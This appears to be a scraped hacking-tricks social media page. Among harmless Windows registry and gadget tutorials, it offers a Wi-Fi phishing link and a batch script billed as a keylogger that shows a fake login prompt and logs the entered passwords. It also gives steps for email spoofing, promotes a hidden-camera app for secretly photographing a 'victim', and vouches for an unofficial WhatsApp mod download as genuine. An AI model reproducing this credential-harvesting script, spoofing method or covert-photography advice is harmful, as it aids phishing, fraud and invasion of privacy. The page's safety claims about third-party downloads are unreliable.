Method to hack WPA/WPA2 security
http://bit.ly/wifi-phisherand Share
(:
World of Hackers and Programmers
Join us for more tricks and more hacking methods.. :-)
Check us on :
http://www.hiddentechworld.blogspot.in/
How to create a key lovger
Here is a basic keylogger script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only.
off color a title Logincls echo PleaseEnterEmailAdressAndPassword
echo.echo.cd "C:\Logs"set/p user=Username:set/p pass=Password:echo Username="%user%"Password="%pass%">>Log.txt start >>ProgramHere
15/04/2015
http://fossbytes.com/chrome-42-sends-notifications-from-web-pages-you-have-closed-download-now/
Get new Chrome nd see the new features...must update last one :)
:)
Chrome 42 Can Send Notifications from Web Pages You Have Closed, Download Now Today Google has launched Chrome 42 for Windows, Linux and Mac. This release can come bundled with new developer tools that will allow developers to create more immersive application for web.
15/04/2015
How To Email Spoofing (Fake Message From Other Email) 1-Open You Browser And Type URL (" http:// fogmo.com/") 2-At The Top Right Press On Sign Up(" http:// fogmo.com/ account/signup") 3-Write All The Requried Thing To Finish the Sign up 4-Press on Compose Then Write The Details
Like n Share plz :)
:)
Sorry guyz for being so late..but i m bCk again :)
15/04/2015
how to increase UTorrent speed.. :)
Plz like n share :)
Hackin:How To Speed up UTorrent Facebook Link: https://www.facebook.com/hackin.master.300?fref=ts Please Like, Share , Subscribe And comment
15/09/2014
HACK or Simply Change XP Start
Button Name
Resource HackerTM is a freeware utility to view, modify,
rename, add, delete and extract resources in 32bit
Windows executables and resource files (*.res). It
incorporates an internal resource script compiler and
decompiler and works on Win95, Win98, WinME, WinNT,
Win2000 and WinXP operating systems.
ll its just 541Kb in the size.. Click here to go to the
Download Page
Download Resource Hacker
First Step The first step is to make a backup copy of
the file explorer.exe located at C:\Windows\explorer.
Place it in a folder somewhere on your hard drive
where it will be safe. Start Resource Hacker and open
explorer.exe located at C:\Windows\explorer.exe
The category we are going to be using is String Table
In Resource Hacker. Expand it by clicking the plus sign
then navigate down to and expand string 37 followed
by highlighting 1033. If you are using the Classic
Layout rather than the XP Layout, use number 38. The
right hand pane will display the stringtable as shown
in Fig. 02. We’re going to modify item 578, currently
showing the word “start” just as it displays on the
current Start button.
There is no magic here. Just double click on the word
“start” so that it’s highlighted, making sure the
quotation marks are not part of the highlight. They
need to remain in place, surrounding the new text that
you’ll type. Go ahead and type your new entry
Second Step – Modify the Registry Now that the
modified explorer.exe has been created it’s necessary
to modify the registry so the file will be recognized
when the user logs on to the system. If you don’t know
how to access the registry I’m not sure this article is
for you, but just in case it’s a temporary memory lapse,
go to Start (soon to be something else) Run and type
regedit in the Open: field. Navigate to:
HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\
Windows NT\ CurrentVersion\ Winlogon
the Right pane (Fig. 05), double click the Shell entry to
open the Edit String dialog box as shown in Fig. 06. In
Value data: line, enter the name that was used to save
the modified explorer.exe file. Click OK.
Close Registry Editor and either log off the system and
log back in, or reboot the entire system if that’s your
preference. If all went as planned you should see your
new Start button with the revised text.
Sorry guys due to some reason I could not add any post...i will make sure dat now I make my schedule as that I can take sum time for all of you...now I m bck,,,so ready to take sum more gud tricks and sum advantage of .... ;-)
13/07/2014
How to create a gadget in windows 7 ***
Step 1 : First of all make a new folder on your desktop and rename it anything you want..
Step 2 : Put the HTML file which would be your gadget into the folder and rename the file as the name of the gadget. In this case the name would be NXClock.html. The demo code for the html is given below..
*Caution : If u know HTML mess with it or else dont modify just learn and come back to make a gadget..
code :
NXClock
Sub Window_Onload
document.body.style.width = 155
document.body.style.height = 50
document.body.style.margin = 0
End Sub
Function Clock()
box.value = time
X = SetTimeOut("Clock()", 1000)
End Function
input {background-color: #000000;
color: ;
text-align: center;
font-size: 24pt;}
Step 3:Now save the following code as gadget.xml EXACTLY into the folder you created earlier. Do not name it anything else or the gadget will not work. You must replace the NXClock.html with the name of the html file if you are making your own gadget. And you can change the title too..
*Caution : If u know HTML mess with it or else dont modify just learn and come back to make a gadget..
code :
NXClock
1.0.0.0
Description
Full
Step 4 : Add the NXClock.html and gadget.xml to a zip file.. Be careful to add the files to the zip file, NOT the folder containing them..
Step 5 : Now change the extension of the zip file to gadget.. You can either do this by going to folder options > View and disabling the hide extensions for known file types and then changing the extension. Or else you can do it using command prompt..
Step 6 : Now you will have ended with a windows gadget file.. Open it and click install and if all went right a new gadget would appear on your desktop..
World of Hackers and Programmers
World of Hackers and Programmers
World of Hackers and Programmers
World of Hackers and Programmers
World of Hackers and Programmers
:))
10/07/2014
7 Windows 7 Registry Hacks
In the 2 years since Windows 7 made its appearance,
it’s already helped bury some of the bad will
generated by its immediate and underloved
predecessor, Windows Vista. We were a little bit
skeptical at first about whether it was worth buying,
but we’ve really come to appreciate its features, from
increased speed to DirectX 11 support, as well as its
overall attractiveness and ease of use.
Of course that doesn’t mean it can’t be improved a bit
more in certain areas. Sure, keyboard and mouse
shortcuts are nice, but you can only get more
thorough personalization—like changing the look of
the logon screen, the Taskbar, or even Internet
Explorer 8′s title bar—by digging deeper—into the
Registry.
We did some investigating and dug up these seven
tweaks that you can make to drastically change the
way Windows 7 looks and behaves, most of which
require spending only a few minutes in Regedit. (One
requires spending a few seconds in Windows Explorer,
too.) Insert the standard disclaimer here: Playing
around in the Registry can be potentially dangerous
to your computer, so don’t dive in unless you feel
confident about looking for, and changing, things in
the Registry.
The easiest way to start Regedit is to hit the Window
key on your keyboard, type regedit, and then hit Enter.
(You can also do this by clicking on the Start button
as well.) Before you make any changes it’s probably
smart to back up the key or subkey you’re planning
on tinkering with. Once you’ve navigated to the key
you’re planning to change, right-click on it and select
“Export” from the pop-up menu. Pick a location to
save the resulting REG file, and you’re protected.
In this story, Registry entries are frequently
represented with quotation marks around them for
clarity; you shouldn’t type those in when you’re
making your changes. And once you’ve changed a
key, it won’t take effect right away—you’ll need to exit
Windows (or reboot) and restart first.
Have a favorite Registry tweak or hack of your own?
Let us know in the comments.
1. Change Your Logon Screen Background
Changing the wallpaper on your desktop is one of the
easiest things to do in Windows. But if you can have
that display any image you want, why not do the
same with your logon screen?
1. Navigate to
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows
CurrentVersionAuthenticationLogonUIBackground.
2. Find the “OEMBackground” key; or right-click in the
right pane and select “New,” then “DWORD (32-bit)
Value” to create it (and then give it that name).
3. Double-click on “OEMBackground” to open it.
4. Change the value in the “Value data” field to 1.
5. Click OK.
6. Using Windows Explorer, navigate to your Windows
directory, then System32oobe. If there’s a folder in
here called “info,” go into it; if there’s a folder inside
of that one called “backgrounds,” go into that. If
neither exists, you’ll need to create them both first.
7. Copy the image (it must be a JPEG, and smaller
than 256KB in size) you want to use as your logon
screen background into the infobackgrounds folder.
8. Rename the image backgroundDefault.jpg. (Note: If
you choose an image that’s sized differently than
your desktop and you change your resolution, it will
be adjusted to fit—with a possible loss in quality. The
infobackground folder also supports 12 other files of
specific resolutions. The files should be named
background # # .jpg, where the # # is one of
the following: 900×1440, 960×1280, 1024×1280,
1280×1024, 1024×768, 1280×960, 1600×1200,
1440×900, 1920×1200, 1280×768, or 1360×768. For
example, background1920x1200.jpg will be used at
1,920-by-1,200 resolution, and so on.)
The next time you restart your computer, or log out,
you’ll see this image as the new logon screen. If you
chose an image that prevents the buttons and text
from looking their best on the logon screen, you can
adjust their appearance as well.
1. Navigate back to
HKEY_LOCAL_MACHINESoftwareMicrosoftWindows
CurrentVersionAuthenticationLogonUI (you’re not
going into Background this time).
2. Add a DWORD value called “ButtonSet.”
3. Change its value to either 1 (darker text shadows
and lighter buttons, intended for lighter backgrounds)
or 2 (no text shadows and opaque buttons, for darker
backgrounds); 0 is the Windows default.
2. Personalize the IE8 Title Bar
If you use Internet Explorer 8 in Windows 7, you’re
probably familiar with the browser’s title bar, which
appends “Windows Internet Explorer” to the end of
every page name. Why not change it to something a
little more… you?
1. Navigate to
HKEY_CURRENT_USERSoftwareMicrosoftInternet
ExplorerMain.
2. Right-click in the right panel, click “New,” and then
select “String Value.”
3. Name the string value you just created “Window
Title” (space included).
4. Double-click on Window Title.
5. Type your personalized title in the “Value data”
field.
6. Click OK.
3. Turn Off Aero Snap
Implemented as an easier way to arrange windows on
your desktop, Aero Snap will automatically maximize
a window if you drag it to the top of the screen, or
resize a window to use exactly half your display’s
width if you drag it all the way to the left or the right.
If you don’t find this feature convenient, you can
disable it.
1. Navigate to HKEY_CURRENT_USERControl
PanelDesktop.
2. Scroll down to “WindowArrangementActive” in the
right-hand pane, and double-click it to open it.
3. Change the number in the “Value data” field from
1 (Aero Snap is enabled) to 0.
4. Click OK.
4. Change Taskbar Button Stacked Window Behavior
By default, the Taskbar groups together multiple
windows of a single app, then displays all of them as
thumbnails when you click on the program’s Taskbar
icon. If you think it would be more handy to have
Windows automatically open the last window when
you click the icon, you can make that happen.
1. Navigate to
HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionExplorerAdvanced.
2. Right-click in the right pane, and select “New” then
“DWORD (32-bit) Value.”
3. Rename the new DWORD value “LastActiveClick.”
4. Double-click on LastActiveClick to open it.
5. Change the value in the “Value data” field to 1.
6. Click OK.
5. Change the Width of Taskbar Buttons
Windows 7 is set up to always combine Taskbar
buttons from the same program and never display
their labels. If, however, you’ve changed the setting to
either not combine the windows at all or to only
combine them when the Taskbar is full, you can
change the icons’ width to hide the labels there, too.
Here’s how.
1. Navigate to HKEY_CURRENT_USERControl
PanelDesktopWindowMetrics
2. Scroll to find the “MinWidth” entry. If it’s not there,
you’ll have to create it yourself. Right-click in the
right pane, select New, then Select “String Value,” and
name the object MinWidth.
3. Double-click MinWidth to open it.
4. Change the number in the “Value Data” field the
width you want to allot to the icons. With the default
small buttons, 38 is sufficient; with the larger icons,
you’ll want about 52.
5. Click OK.
6. Change the Delay Time of Taskbar Previews
Among the cooler features in Windows 7 are Taskbar
previews, which appear when you hover the mouse
cursor over the Taskbar icon of a currently running
program. But when you do this, the preview doesn’t
appear immediately. Luckily, it’s easy to speed it up (r,
for whatever reason, slow it down.
1. Navigate to
HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionExplorerAdvanced
2. Right-click in the right pane, click “New,” and click
“DWORD Value” or “DWORD (32-bit) Value.”
3. Name the new DWORD “ExtendedUIHoverTime.”
4. Double click on ExtendedUIHoverTime to open it.
5. Click the “Decimal” radio button in the “Base”
section. In the “Value data” field, enter the delay time
(in milliseconds) for the preview to appear. (The
Windows standard is 400ms.)
6. Click “OK” to commit the change.
When you hover the mouse cursor over one of the
previews, all your other windows will disappear and
show just that window. There’s a delay associated
with this, too. To change this, add a new DWORD in
the same location called
“ThumbnailLivePreviewHoverTime,” and edit it the
same way as above, setting its value to whatever you
want (in ms).
7. Change the Delay Time of Aero Peek
Aero Peek is Windows 7′s sleeker replacement for the
old Show Desktop button. Just move your mouse
cursor over the icon at the right end of the Taskbar to
turn all your Windows invisible. But this, too, has a
delay time associated with it, so if you find yourself
accidentally activating it too often, you may want to
increase the delay time. Here’s how.
1. Navigate to
HKEY_CURRENT_USERSoftwareMicrosoftWindows
CurrentVersionExplorerAdvanced
2. Right-click in the right pane, click “New,” and click
“DWORD Value” or “DWORD (32-bit) Value.”
3. Name the new DWORD
“DesktopLivePreviewHoverTime.”
4. Double click on DesktopLivePreviewHoverTime to
open it.
5. Click the “Decimal” radio button in the “Base”
section. In the “Value data” field, enter the delay time
(in milliseconds) for the preview to appear. (The
Windows standard is 1,000ms.)
6. Click “OK” to commit the change.
:))
Like us for more tricks :
World of Hackers and Programmers
World of Hackers and Programmers
World of Hackers and Programmers
World of Hackers and Programmers
World of Hackers and Programmers
10/07/2014
Features of WhatsApp Plus :
The WhatsApp Plus is also used to send unlimited
number of free text messages to any user who is
using it on his/her phone. Users can share photos,
videos and voice notes easily and they won’t be
charged anything for using any of these features.
The Most important Feature Is The User Can Hide His
Last Seen.
This is free for first year but after than you need to
pay a marginal price for using it for the next year. But
in case if you don’t want to pay that price then you
should use this new version which doesn’t ask for
any price.
Just like official app, WhatsApp Plus also brings
identical impressive, simple and elegant user
interface. As a user you won’t find any trouble in
using any feature of this app. The unique feature in
WhatsApp Plus is that you can change the color of
the logo of the app and can also choose different
theme from its settings to give a personal look to the
app to woo your friends.
The app got lots of themes included within and more
new themes are coming with the recent updates. Yes,
this app is well maintained by its developer and they
keep on update it with recent patches and features. If
you doubt whether WhatsApp Plus is genuine or not
then I must say that WhatsApp Plus is completely
genuine and you can use it without thinking again
about its genuineness.
Note : Uninstall The Current Version Then Re-install
The New Version.
Download Link :
http://www76.zippyshare.com/v/60742045/file.html
like us for more tricks :
World of Hackers and Programmers
World of Hackers and Programmers
World of Hackers and Programmers
World of Hackers and Programmers
World of Hackers and Programmers
05/07/2014
Transparent Screen Camera To
Capture Pics Secretly
Transparent Spy Camera is the app which can be
used to capture pictures secretly with no one knowing
that you are using camera. A plus point of this app is
that you can adjust the transparency level of your
display screen and hidden camera anytime according
to your convenience. App supports both front camera
as well as rear camera of phone and can be used by
any of them.Transparent Spy Camera app is basically
used to spy using your Android phone and hiding
what you are really doing.
The primary feature of app is to make the display of
your phone transparent that allows you to see what is
going on behind the back of your phone. By default it
provides 50% transparency on screen. When you start
the app , you are provided with 50% opacity , later
you can increase or reduce the value of opacity to
match your requirements. You can also rotate the
images provided by the camera in any direction if you
want. To stop the transparency mode you can simply
swipe down the notification bar and there you will
find option to stop the spy mode.
Once you secretly capture picture of your victim half
work is done. All the pictures taken by this are hidden
in a vault and not visible to anyone. Here one more
outstanding feature of this app comes in action. In
order to access the hidden pictures , you need to open
the pictures folder , click on all pictures and export
them.
If you open the picture within the app , it will show a
different picture that functions as a facade. It provides
one more great feature , you have to enter a
password in order to access pictures but if you enter
incorrect password , the app will take you to a Fake
Note Writing application. It is very useful because
there are many people who always try to guess some
password for every login screen and because of this
feature they will feel that they have successfully
logged in but in actual the pics are secure.
This app comes along with lots of ads. Ads are in the
form of pop-ups as well as permanently situated at
the top of window. Every-time you move to a new part
of the app , a new ad will appear which makes the
usability of app a bit difficult. Controls of this app are
basically divided into two parts and present at the
transparent screen and on settings page.
Functionality of app is based on concept of illusion
because real pictures are hidden behind the fake once
and only real user can have access to those pics.
The performance and speed of running as well as
operations is not quite satisfactory for Android below
version 3.0 In many lower versions of Android , app
keeps on crashing. Especially when you try to set the
resolution and opacity of display screen , the app is
more likely to crash. The problem doesn't occur in
higher versions of Android so if you have Android
version higher than 3.0 then app can work fine for
you.
You can hide App's icon in launcher
screen
Hide pictures automatically
Front and Back Camera support
No rooting of phone is required
Possible to adjust transparency level
manually
You dont need to click any button to
capture pic , just hold the phone.
:))
Click here to claim your Sponsored Listing.
Location
Category
Telephone
Address
Jaipur